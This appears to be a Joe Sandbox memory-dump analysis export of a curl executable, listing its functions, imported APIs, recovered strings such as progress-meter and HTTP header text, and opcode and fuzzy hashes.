** Resuming transfer from byte position %I64d, xrefs: 000000013F336C20
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 000000013F336E61
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 000000013F336C33

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fflush
String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
API String ID: 497872470-664487449
Opcode ID: f6cc403234ab24a6ccd709371225e56054959eb24fa1324d6ef3ed700ac6cb8d
Instruction ID: a227796eddff024eabf9d65a57ee72252f44b84b649e7887daea8e2807d18d40
Opcode Fuzzy Hash: f6cc403234ab24a6ccd709371225e56054959eb24fa1324d6ef3ed700ac6cb8d
Instruction Fuzzy Hash: BD919372B01B9885EE80DB56E555BD973A8FB84BC8F45103AEE0D1B765DF34C652C700

Function 000000013F318EE4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F318F2C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F318F3A
__swprintf_l.LIBCMT ref: 000000013F31906E

Strings

%u.%u.%u.%u, xrefs: 000000013F31905F

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_l_errnostrtoul
String ID: %u.%u.%u.%u
API String ID: 3822977173-1542503432
Opcode ID: 1f30ee1e9ff87b2e4371e72a35b9e96df50a113ad7cb5ef3248472817614dcce
Instruction ID: 959479ac2c0cee91cb6fd85671b77931a00a1d830df7858c8bbff9e625459e0a
Opcode Fuzzy Hash: 1f30ee1e9ff87b2e4371e72a35b9e96df50a113ad7cb5ef3248472817614dcce
Instruction Fuzzy Hash: 67419072F052908AF7349BB598407FD3BB1B3857E8F144539DE9622E99D638CB82DB10

Function 000000013F325758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F31DE4D), ref: 000000013F32580A
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F31DE4D), ref: 000000013F325827
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F31DE4D), ref: 000000013F3258A9

Strings

Set-Cookie:, xrefs: 000000013F3258BA

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: Set-Cookie:
API String ID: 4110152555-2427311273
Opcode ID: 58dabe0e95b27be41a14ae10c8e4b7d34450b216fd677b6ec1fe5318a811b9da
Instruction ID: 9a962cdb749c535358e8eb3161dd63bfec24d67313678a3eccb3b8223a9f496c
Opcode Fuzzy Hash: 58dabe0e95b27be41a14ae10c8e4b7d34450b216fd677b6ec1fe5318a811b9da
Instruction Fuzzy Hash: 2041ED3AB05784A1FFA59B22E4043E967A0BB85BD4F18403DDD4A0B7A1DB79CB47C340

Function 000000013F3113AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F311406
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F3114C5
__swprintf_l.LIBCMT ref: 000000013F3114DF

Strings

\x%02x, xrefs: 000000013F3114D2

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_lisprintmalloc
String ID: \x%02x
API String ID: 646383617-50714050
Opcode ID: 22c699b7bdc6f8c99bf79f02619325e5f62e9853553d1ccccfc965a1fa40d3d3
Instruction ID: 83ca96558da620176db3dd2702373be988deb8a11060493e510cc94c73dcc553
Opcode Fuzzy Hash: 22c699b7bdc6f8c99bf79f02619325e5f62e9853553d1ccccfc965a1fa40d3d3
Instruction Fuzzy Hash: 59419036E0429484F7217F25B8407F97BB8B718BA4F04513AED9A873D5EA6C8693D341

Function 000000013F33C908 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F33C9B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F33CA03
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F33CA42

Strings

realm, xrefs: 000000013F33C999

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$_strdup
String ID: realm
API String ID: 2653869212-4204190682
Opcode ID: 3a493681dc92efc8fdbbf39734521db5c68439b0495f61c1c317c20e1a91c94f
Instruction ID: cf9f4a56d3ded08203f7d62a9c3250db5f466f554aa7b237a36b4e2e1d8f247e
Opcode Fuzzy Hash: 3a493681dc92efc8fdbbf39734521db5c68439b0495f61c1c317c20e1a91c94f
Instruction Fuzzy Hash: A9418932A15A84C5EA64CF21E8143E927E0F749BD4F44163AEA9E43795DB38C78AC740

Function 000000013F313688 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000000013F31385A,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F313585), ref: 000000013F3136BD
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000000013F31385A,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F313585), ref: 000000013F313722
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000000013F31385A,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F313585), ref: 000000013F31376A

Strings

u%04x, xrefs: 000000013F3136FC

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fputc$fputs
String ID: u%04x
API String ID: 1019900953-2707630279
Opcode ID: 277b776edbe826962224f75c53135ca2eff72bcc5dcb1799fcb2f0b914ff2d5d
Instruction ID: 71c80cfca24228579dacf90ffbb62ae8985d9b01f70843cd006ff9940a8c5b53
Opcode Fuzzy Hash: 277b776edbe826962224f75c53135ca2eff72bcc5dcb1799fcb2f0b914ff2d5d
Instruction Fuzzy Hash: 1F31A7B1E09941C1FA68AF29A9A83FD6771B3517E0F94413DD65B026E5DB28CB4BC301

Function 000000013F303620 Relevance: 6.3, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30363D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F303662
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F303687
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3036AC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3036D1

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 23bcfd8c3edb1cac29dd381e654b8375a78a08816616135fa5c85e0b472d848f
Instruction ID: fe7fe9f44db5045e84ce3b5e48cd01529546a81f6c11f338d2d8ac554b733540
Opcode Fuzzy Hash: 23bcfd8c3edb1cac29dd381e654b8375a78a08816616135fa5c85e0b472d848f
Instruction Fuzzy Hash: 9321C832B12A05D2FF05AF21E8A53E463E4BB88B44F0C453DD92A4A261DF6DC65AD385

Function 000000013F30A62C Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000000013F30A7A6,?,?,?,?,000000013F3011A7), ref: 000000013F30A69E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,000000013F30A7A6,?,?,?,?,000000013F3011A7), ref: 000000013F30A6EB
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,000000013F30A7A6,?,?,?,?,000000013F3011A7), ref: 000000013F30A6FC
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,000000013F30A7A6,?,?,?,?,000000013F3011A7), ref: 000000013F30A71C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fputs$fwrite
String ID:
API String ID: 2206100360-0
Opcode ID: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
Instruction ID: 60e79a2a892d6a4db222b03b9ab608169cfc6875a47b9a4a903ae5af9efefaa6
Opcode Fuzzy Hash: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
Instruction Fuzzy Hash: 1431D432F06A9988EF519F26E4047E86B61B745FE4F49453ADD6B077D4DA2CC68BC300

Function 000000013F30FE2C Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F30FE93
ferror.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F30FE9F
feof.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F30FEC7

Part of subcall function 000000013F313AE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F313B1B

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30FEEF

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$feofferrorfread
String ID:
API String ID: 1112580154-0
Opcode ID: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
Instruction ID: 079fe48f897989bb9d7fdd64c38ac581d052d1771b25d7bf4dfd46e80c489b35
Opcode Fuzzy Hash: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
Instruction Fuzzy Hash: 26218372A15A8186F7609F21E8543EA63A0F798BC8F040539EB8E47795DF7CC646C700

Function 000000013F32C2A8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F303E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303E89

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F32C2F3

Strings

., xrefs: 000000013F32C315
unlimited, xrefs: 000000013F32C2E7
%256s "%64[^"]", xrefs: 000000013F32C2D6

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __stdio_common_vsscanfstrcmp
String ID: %256s "%64[^"]"$.$unlimited
API String ID: 2755920870-3006405630
Opcode ID: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
Instruction ID: 859f28cfe6116c00ee1d68491d238e2e68e88dbbb62ca5a13774616987c03a41
Opcode Fuzzy Hash: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
Instruction Fuzzy Hash: 1E01B976A08685A1FE60D731E4513DA63D0F7887A4F940636DAAD476D5DF2CC30BCB00

Function 000000013F32BB58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 000000013F32BB8C

Part of subcall function 000000013F33585C: inet_pton.WS2_32 ref: 000000013F335881
Part of subcall function 000000013F33585C: inet_pton.WS2_32 ref: 000000013F335898

Strings

max-age=, xrefs: 000000013F32BBD8
includesubdomains, xrefs: 000000013F32BC91

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: inet_pton$_time64
String ID: includesubdomains$max-age=
API String ID: 868955570-1235841791
Opcode ID: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
Instruction ID: a8716df201603c08a7f55545571962dbd49e0ff7b519f00b74d5bebeb5d9dd5e
Opcode Fuzzy Hash: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
Instruction Fuzzy Hash: 9361303AA0469566FA758F25E8603EA2BD0B706BD4F98443CDD9A073D5DE3CC607C720

Function 000000013F332910 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F332BF1

Strings

No URL set, xrefs: 000000013F33299F
User-Agent: %s, xrefs: 000000013F332BE3

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: No URL set$User-Agent: %s
API String ID: 1992661772-339178133
Opcode ID: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
Instruction ID: 9a61577f0804e67f14220d70fa7e1250dc606550dbcf7129b0ffd5f038cae25f
Opcode Fuzzy Hash: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
Instruction Fuzzy Hash: D3A10636B09B80A7EB5DDB35D6903E9B7A4F718B90F04012AEB6947791DF24E672C340

Function 000000013F335634 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 000000013F335685
inet_pton.WS2_32 ref: 000000013F3356A4

Strings

::1, xrefs: 000000013F335695

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: htonsinet_pton
String ID: ::1
API String ID: 3877577928-2731173655
Opcode ID: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
Instruction ID: a9afaff5698f8afa55c302b8297549c0ff4fddb54de1d1ee5f029f836495e848
Opcode Fuzzy Hash: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
Instruction Fuzzy Hash: 6131DD33914B84C6E710CF20E4453AA73B0FB98B88F248229DA8C4B719DB7DD696CB40

Function 000000013F3137A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F313585), ref: 000000013F3137CB
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F31381E

Strings

"curl_version":, xrefs: 000000013F313838

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fputs
String ID: "curl_version":
API String ID: 1795875747-1127485152
Opcode ID: 8656f8eb16561c1942904a16d6f56fda332278a3463819e59bc60b2a4c127616
Instruction ID: 31d5b7b37150888b58d314be9d2059074a43b50f23a2f0e004e149ac8906e39f
Opcode Fuzzy Hash: 8656f8eb16561c1942904a16d6f56fda332278a3463819e59bc60b2a4c127616
Instruction Fuzzy Hash: 4F215B72A11A9091EA11EF26E8953D9A7A0FB88BD4F854439DD0947764DF3CC25BC300

Function 000000013F335740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 000000013F335760
inet_pton.WS2_32 ref: 000000013F335779

Part of subcall function 000000013F335634: htons.WS2_32 ref: 000000013F335685
Part of subcall function 000000013F335634: inet_pton.WS2_32 ref: 000000013F3356A4

Strings

127.0.0.1, xrefs: 000000013F33576D

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: htonsinet_pton
String ID: 127.0.0.1
API String ID: 3877577928-3619153832
Opcode ID: 93b06e7648510524775c2b6d04d80b245e725dbf242ffdf64893bda09ddb95bd
Instruction ID: f76f6f415a696d588c3694165346cdff93d087685fbae28c71b5637597589332
Opcode Fuzzy Hash: 93b06e7648510524775c2b6d04d80b245e725dbf242ffdf64893bda09ddb95bd
Instruction Fuzzy Hash: 7E215877A11B44C6EB01CF24E4443ADB7B0FB98B04F258629DB4947361EB7DC68ACB84

Function 000000013F323AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 000000013F323B67
setsockopt.WS2_32 ref: 000000013F323B96

Part of subcall function 000000013F313968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F31399D
Part of subcall function 000000013F313968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F3139AD

Strings

@, xrefs: 000000013F323B04

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: AddressHandleModuleProcgetsockoptsetsockopt
String ID: @
API String ID: 1224256098-2726393805
Opcode ID: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
Instruction ID: 9cfe8969f31422a27df8c648bcd38678bb13d82aacbcf3050510322153a330c3
Opcode Fuzzy Hash: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
Instruction Fuzzy Hash: 5E115B76A04680D7F760CF24E44839AB7A1F785389F500138EE8547BA9D7BDC68ACF04

Function 000000013F30A7AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000014,00000000,000000013F309BD1), ref: 000000013F30A7D7

Strings

curl: , xrefs: 000000013F30A7D0
curl: try 'curl --help' for more information, xrefs: 000000013F30A7F4

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fputs
String ID: curl: $curl: try 'curl --help' for more information
API String ID: 1795875747-4128371185
Opcode ID: e8ad7becc2f11b03f9842552c4c794a81601776dc52dd38ec840e7c5da76bb48
Instruction ID: 3fd14c75777caffc835f73b3f898dcf3385c3577c70da8e9f247e69fef1f1702
Opcode Fuzzy Hash: e8ad7becc2f11b03f9842552c4c794a81601776dc52dd38ec840e7c5da76bb48
Instruction Fuzzy Hash: 01F058B5A01B0481EE48DF16F9853C86731BB9ABD0F90903ACE1907324EB38C69AC300

Function 000000013F312B5C Relevance: 5.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000000013F30B6E1), ref: 000000013F312BAB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000000013F30B6E1), ref: 000000013F312BC2
